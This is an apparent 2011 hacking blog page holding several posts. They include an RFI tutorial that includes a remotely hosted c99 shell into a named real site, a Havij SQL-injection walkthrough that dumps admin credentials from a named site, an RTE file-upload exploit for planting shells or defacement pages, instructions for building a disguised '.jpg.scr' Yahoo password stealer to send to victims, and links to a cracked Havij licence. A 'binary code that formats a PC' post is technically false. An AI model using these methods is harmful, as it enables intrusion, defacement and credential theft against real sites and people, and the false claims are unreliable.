Sponsor

Thursday 24 November 2011

How to compress 1 Gb data to 10 mb

Hey guyz this time Learn Hacking has brought something very interesting for you guyz. Many times our hard disk runs out of space and we have to delete some data or the other for no reason. Even I used to face the problem sometime back in history and by doing some research on the topic, I actually found a working and an awesome way to save my hard disk space.


How effective is it?


Well by this method I converted NFS UNDERGROUND 2 which is somewhat around 2 Gb tb 21 Mb. And same is the case with everything important I wanted to save.


How did I do it?


You are just about to know… Read on.


I used a software named KGB Archiver.


About KGB archiver: KGB Archiver , an open source compression tool like 7zip and UHARC with an unbelievably high compression rate .It uses AES-256 encryption (one of the strongest encryption known for man) to encryptarchives . The disappointing thing with KGB Archiver is due to its high compression rate its minimum hardware requirement is high ( recommend processor with 1,5GHz clock and 256MB of RAM ) and compression and decompression process is time consuming.



Its strength: Very high compression power with very accurate results and no loss of data.
Its weeknss: Due to high compression , the time required to compress and decompress the file is high. High system requirement
From where can you download this software.?
Just click on the link given to Download KGB archiver for free.
I am sure you loved this post
Just enjoy and keep liking :)
===========================================
Earn upto Rs. 9,000 pm checking Emails. Join now!
================================================

How to Change IP address

How to change your IP address in less than a minute? The following trick gives you a step-by-step procedure to change your IP address.






1. Click on “Start” in the bottom left hand corner of screen.
2. Click on “Run”.
3. Type in “command” and hit ok.You should now be at an MSDOS prompt screen.
4. Type “ipconfig /release” just like that, and hit “enter”.
5. Type “exit” and leave the prompt.
6. Right-click on “Network Places” or “My Network Places” on your desktop.
7. Click on “properties”.
You should now be on a screen with something titled “Local Area Connection”, or something close to that.
8. Right click on “Local Area Connection” and click “properties”.
9. Double-click on the “Internet Protocol (TCP/IP)” from the list under the “General” tab.
10. Click on “Use the following IP address” under the “General” tab.
11. Create an IP address (It doesn’t matter what it is. I just type 1 and 2 until i fill the area up).
12. Press “Tab” and it should automatically fill in the “Subnet Mask” section with default numbers.
13. Hit the “Ok” button here.
14. Hit the “Ok” button again. You should now be back to the “Local Area Connection” screen.
15. Right-click back on “Local Area Connection” and go to properties again.
16. Go back to the “TCP/IP” settings.
17. This time, select “Obtain an IP address automatically”.
18. Hit “Ok”.
19. Hit “Ok” again.
20.  Now You have a new IP address.

Some ISPs do not support this type of procedure and hence there are chances of getting back the same old IP address even after trying this hack. In this case you need to switch off the modem and then switch it on to get the new IP address.
NOTE: All these tricks works only if you have a dynamic IP address. But if you have a static IP address you have no option to change your IP.
Enjoy....!!



===========================================
================================================

Tuesday 22 November 2011

CHAT Anonymously Through Command Prompt

  • What you need? > you need your friend's IP Address and Command Prompt
  • Open Notepad and write this code : 

@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A


  • Save this as "Messenger.Bat".
  • Open command prompt 
  • Drag bat file over to Command Prompt and press Enter 
  • This should came up 


Now, type the IP Address of the computer you want to contact and press enter
You will see something like this:



Now all you need to do is type your message and press Enter.

Enjoy..!!





===========================================
Earn upto Rs. 9,000 pm checking Emails. Join now!
================================================

Saturday 19 November 2011

RFI (Remote File Inclusion) : Website Hacking Tutorial

Hello friends here i am posting one another method of website hacking called RFI (Remote File Inclusion)
Remote File Inclusion (RFI) is a type of vulnerability often found on websites. It allows an attacker to include a remote file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation.



Lets Start
1st Step : Find a Vunerable websites using Google Dork

Click here to get more RFI dork

“inurl:index.php?page=” its a Dork of RFI hacking
It will show all the pages which has “index.php?page=” in their URL, Now to test whether the website is vulnerable to Remote file Inclusion or not the hacker use the following command
www.targetsite.com/index.php?page=www.google.com

see example of this website http://www.cbspk.com
http://www.cbspk.com/v2/index.php?page=http://www.google.com

If after executing the command the homepage of the google shows up then then the website is vulnerable to this attack if it does not come up then you should look for a new target. In my case after executing the above command in the address bar Google homepage shows up indicating that the website is vulnerable to this attack.

Now the hacker would upload the shells to gain access. The most common shells used are c99 shell or r57 shell. I would use c99 shell. You can download c99 shell from the link below:

http://www.sh3ll.org/c99.zip

Now we need to upload the shells to a webhosting site such as ripway.com, viralhosts.com,110mb.com or another free hosts etc.

Now here is how a hacker would execute the shells to gain access. Lets say that the url of the shell is http://www.sh3ll.org/c99.txt?

Now here is how a hacker would execute the following command to gain access

http://www.cbspk.com/v2/index.php?page=http://www.sh3ll.org/c99.txt?




Don't Forget To add “?” after .txt at the end of url or else the shell will not execute. Now the hacker is inside the website and he could do anything with it.


+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=++==+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
Earn upto Rs. 9,000 pm checking Emails. Join now!
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=++==+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

Wednesday 16 November 2011

Hack Yahoo Password With Magic Ps 1.5 Final

First Download
MPS 1.5 Final



Magic Ps 1.5 Final
==================




How to use ??
=============


1st :- select Send Y! Mess Pass , Send NetWork IP , Send Computer Name and Auto Startup

2nd :- After Select Fake Error Message

3rd :- Type your yahoo ID ( Note : Just type ID don't use @yahoo.com Ex : John_26 )

4th :- then Choose Icon (Just for .exe and .scr)

5th :- MPS creator -> File Name : any name.jpg.scr

6th :- Create MPS




Now create ur file...send to ur victim..

Enjoy....



+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=++==+=+=+=+=+=+=+=+=+=+=+=
Earn upto Rs. 9,000 pm checking Emails. Join now!
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=++==+=+=+=+=+=+=+=+=+=+=+=

havij 1.15 PRO, cracked licence.

Download Free Havij 1.15 Pro [Final Crack Fixed/+Exidous License]

no crack file only licence file

The final Exidous patch works well, so you can register your Havij with Exidous license.




Download: (dont require installation, just register with Exidous license):

Download
Havij 1.15 pro

Enjoy....


+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=++==+=+=+=+=+=+=+=+=+=+=+
Earn upto Rs. 9,000 pm checking Emails. Join now!
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=++==+=+=+=+=+=+=+=+=+=+=+

CODE THAT FORMATS UR ENEMEY'S COMPUTER.........PLZZ DON'T TRY DIS IN UR PC

Paste the below code in a notepad file:

0100101100011111001001010101010101

Save the file as
'whateveryouwish.exe'
When you open it, the hard
disk formats!!!
You can keep this file in
your school's computer in a
far-off folder.
At first
rename it and send a
shortcut to desktop. Now
hide the original file. Change the icon of the
shortcut to that of My
computer and rename it as
'My Computer' and delete
the original 'My computer'. When someone tries to
open it....BOOOM!!!


If you are unable to format
C drive when the victim's
PC is running, then you can
use the following line of
code:

0110011001101111011100100110110101
100000011000110011101001011100
0010000000101111010100010010111101



It's extremely cool!!! How about making the
computer not to boot in
the first place??
Then use this code:

0110010001100101011011000010000000
101111010100110010111101010001
0010000001100011001110100101110001
101111011101000010111001101001
0110111001101001


You will be astounded at
the result when someone
tries to restart the PC!

NOTE : THIS IS JUST FOR EDUCATIONAL PURPOSE......
==========================================


+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=++==+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
Earn upto Rs. 9,000 pm checking Emails. Join now!
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=++==+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

SQL Injection through Havij (Full Tutorial)

Firstly i am going to introduce the term havij :)
Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.
It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running SQL statements and even accessing the underlying file system and executing commands on the operating system.
The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injecting vulnerable targets using Havij.
The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users.


Download havij 1.10

First Find a sqli infected site .Now here i found a vulernable site

http://www.hypetrading.com/productinfo.php?id=285

Now Let's start

Open havij and copy and paste infected link as shown in figure



Now click in the "Analyze"



Then It shows some messages there....Be alert on it and be show patience for sometime to find it's vulernable and type of injection and if db server is mysql and it will find database name.Then after get it's database is name like xxxx_xxxx



Then Move to another operation to find tables by clicking "tables" as figure shown.Now click "Get tables" Then wait some time if needed



After founded the tables ,you can see there will be "users" Put mark on it and click in the " get columns " tab as shown in figure



In that Just put mark username and password and click "Get data"



Bingo Got now id and pass that may be admin...
The pass will get as md5 you can crack it also using this tool as shown in figure...




+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=++==+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
Earn upto Rs. 9,000 pm checking Emails. Join now!
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=++==+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

Tuesday 15 November 2011

HACK WebSites RTE Webwiz Vulnerability -File Upload Vulnerability

Hi Guyz In this Tutorial i will tell you how to hack web sites with Rte Remote file upload Vulnerability

» 1. use these google dorks for find Sites

inurl:rte/my_documents/my_files
inurl:/my_documents/my_files/


The Exploit is

site.com/rte/RTE_popup_file_atch.asp

site.com/admin/RTE_popup_file_atch.asp

For Example i Got a Web Site.
Site:- http://www.billkonigsberg.com
Vulnerability http://www.billkonigsberg.com/RTE_popup_file_atch.asp

it will look like Screenshot Below





You can upload your html defacepage here and in left site after upload your page will show

You can also upload shell there asp or jpg shell


+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=++==+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
Earn upto Rs. 9,000 pm checking Emails. Join now!
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=++==+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

15 Best Password Cracking Tools Collection

Top 15 Password Hacking/Cracking Softwares
==========================================

Here is a collection of 15 best Password Crackers for cracking PDF Password, Windows 7, Vista and XP Admin Passwords, Zip File Password, MSN Messanger and Yahoo Messanger Passwords, etc. All of the tools come with serial numbers.

This collection includes:

1. PDF Password Remover



PDF Password recovers lost passwords to password-protected PDF files (*.pdf). PDF Password recovers user and permission passwords only. PDF Password does not allow to break DRM (Digital Right Management) system. If user password (also known as password to open) is either not set or known, it is possible to remove permission password instantly.


2. Windows XP Admin Password Remover



Windows Password Cracker can easily extract unencrypted password hashes from systems that use Microsoft's SYSKEY protection. It supports international language input locales, allowing it to work with operating systems and passwords based on single byte character sets including those for European, Cyrillic, Greek, Hebrew, Arabic, and other languages. Windows Password Cracker now includes a 53,000 word English dictionary for comprehensive English dictionary audits. It's is an easy-to-use and fast password recovery software.

3. Zip File Password Cracker



Atomic Zip Password Cracker is created to recover the lost or forgotten passwords for ZIP archives. It can quickly restore the password in several ways: the direct search and the dictionary attack. It has easy-to-work and friendly user interface. There are two modes of password recovering: automatic and user-defined mode. If the automatic mode is set the program makes a password search basing on most frequently used settings (such as capital and small letters, 0-9 figures; maximum 5 symbols length password). If you have the information about the components and length of the password you can try to start the user-defined mode.


4. SQL Password Remover



Kernel SQL Password Recovery is a MDF (Master Data File) password recovery software widely used to recover the lost or forgotten passwords from SQL Server 2000 password-protected database files (*.mdf). The software recovers all the passwords instantly despite the length and complexity of the password. The .mdf files stores the password using strong encryption algorithms. This strong encryption can not be easily decrypted. Kernel SQL Password Recovery will recursively scan the password protected sql database file and will automatically generate the password. The generated password is an alternate password (NOT the Original Password) to unprotect the MDF file.


5. Microsoft Office Password Remover



This software helps recover or delete forgotten Microsoft Office document passwords. The software restores passwords of certain types instantly, plus the latest version of the software allows finding lost hard-cracked passwords seven times faster!

6. Windows Vista Admin Password Recovery



Windows Password Unlocker is a pioneer Windows password recovery with intuitive Windows graphical user interface, but not DOS-like black screen, so that it is much easier to reset Windows login passwords rapidly and conveniently in case an administrator password is forgotten or lost in Windows 2000/2003/NT/XP/Vista/2008. No need to re-install the operating system any more. Just boot from the program CD, choose the account you wish to reset. Then you can log in as a particular user with a blank password. Even with the on-screen step-by-step instructions, the program is so simple to use without any technique.


7. RAR File Password Cracker



RAR Password Recovery proved to be an effective way to uncover lost or forgotten passwords, but--as its name implies--it only works with one file type. Its straightforward, tabbed interface clearly represents the three main password recovery options: Brute-Force, Booost-Up, and Dictionary. Each approach proved successful in our tests, although the demo limits passwords to three characters. Conveniently, you can save password recovery settings in projects for future use. While it can only handle one file format, users who need to unlock their RAR files will find this application up to the task.

8. EXE File Password Recovery


EXE Password Protector is a powerful yet easy to use system utility that allows you to password-protect any Windows executable file in a few steps. This incredible program is intended for those people who share the same computer with others and want to protect sensitive applications from an unauthorized usage. If you are looking for an efficient and fast application that allows you to password-protect any Windows executable file, EXE Password Protector is perfect for you.

9. Password Changer

Active Password Changer Professional is a DOS-based solution designed for resetting local user passwords in case of administrator's password is forgotten or lost. Forgotten password recovery software is useful if you lost the administrator password and cannot access the operation system. Other Windows login security restrictions like 'Account is disabled', 'Password never expires', 'Account is locked out', 'User Must Change Password at Next Logon' and 'Logon Hours' can be changed or reset. Supported platforms: Windows XP, 2000, NT, Windows Server 2003 and Windows Vista.

10. Password Memory

The Password Memory 2010 application was designed to be the perfect password manager for you. Your passwords are encrypted using multiple algorithms to keep them secure. Your login details (username, password, etc.) can be searched and sorted fast easily. Login details associated with a website can also be copied into the webpage with the click of a button. Generating random secure passwords in an instant. You can even install the program on a USB stick and bring your password database securely with you wherever you go.

11. Distributed Password Recovery

If every system administrator's nightmare is forgotten passwords, then this application is every admin's dream. Installation of Elcomsoft Distributed Password Recovery is quick and simple. The clean tab-and-button interface is well-organized. This application cracks Word 97 and Word 2000 passwords, plus the weaker PGP, PDF, and Windows passwords. It takes just a couple of steps to crack most files. The software can unleash agents that harness the power of multiple client machines to improve password-recovery time. Connecting over the network is through a user-specified port, to forestall interference with other applications. Your firewall may have to be set to allow information through the port. The help file is sparse, but the program operates cleanly with little user supervision. E-mail alerts are easy to implement, making this a start-it-and-forget-it piece of software.

12. Windows 7 Password Cracker

The Ophcrack Windows password cracker is by far the best free Windows password recovery tool available. It's fast and easy enough for a first time password cracker with a basic knowledge of Windows. With Ophcrack, you don't need any access to Windows to be able to recover your lost passwords. Simply visit the site, download the free ISO image, burn it to a CD and boot from the CD. The Ophcrack program starts, locates the Windows user accounts, and proceeds to recover (crack) the passwords - all automatically. In a test on a Windows 7 PC, Ophcrack recovered the 10-character password to my administrator account in 40 seconds. Ophcrack supports Windows 7, Windows Vista, and Windows XP.

13. MSN Password Recovery

MessenPass is a password recovery tool that reveals the passwords of all instant messenger applications. MessenPass can only be used to recover the passwords for the current logged-on user on your local computer, and it only works if you chose the remember your password in one of the above programs. You cannot use this utility for grabbing the passwords of other users.

14. Asterisk Logger

Many applications, like CuteFTP, CoffeeCup Free FTP, VNC, IncrediMail, Outlook Express, and others, allows you to type a password for using it in the application. The typed password is not displayed on the screen, and instead of the real password, you see a sequence of asterisk ('****') characters. This utility can reveal the passwords stored behind the asterisks in standard password text-boxes.
Asterisk Logger is a successor of AsterWin utility. It reveals the asterisk passwords in the same way as AsterWin utility, but it has some advantages over the previous utility:
You don't have to press a button in order to reveal the asterisk passwords. Whenever a new window containing a password box is opened, Asterisk Logger automatically reveals the password inside the password-box, and add a record to passwords list in the main window of Asterisk Logger.
Asterisk Logger displays additional information about the revealed password: The date/time that the password was revealed, the name of the application that contains the revealed password box, and the executable file of the application.
Asterisk Logger allows you the save the passwords to HTML file and to 3 types of text files.

15. Mozilla Firefox Password Cracker

PasswordFox enables you to review and export the list of saved logins and passwords that are stored in your Firefox browser. The list can be saved to a text file or exported to HTML format. PasswordFox will let you view passwords from any Firefox profile, not only the current one. A useful tool to backup your login information, keep in mind though that the exported text file in not encrypted and should be stored securely.

Download Best Password Cracking Tools Collection


+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=++==+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
Earn upto Rs. 9,000 pm checking Emails. Join now!
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=++==+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+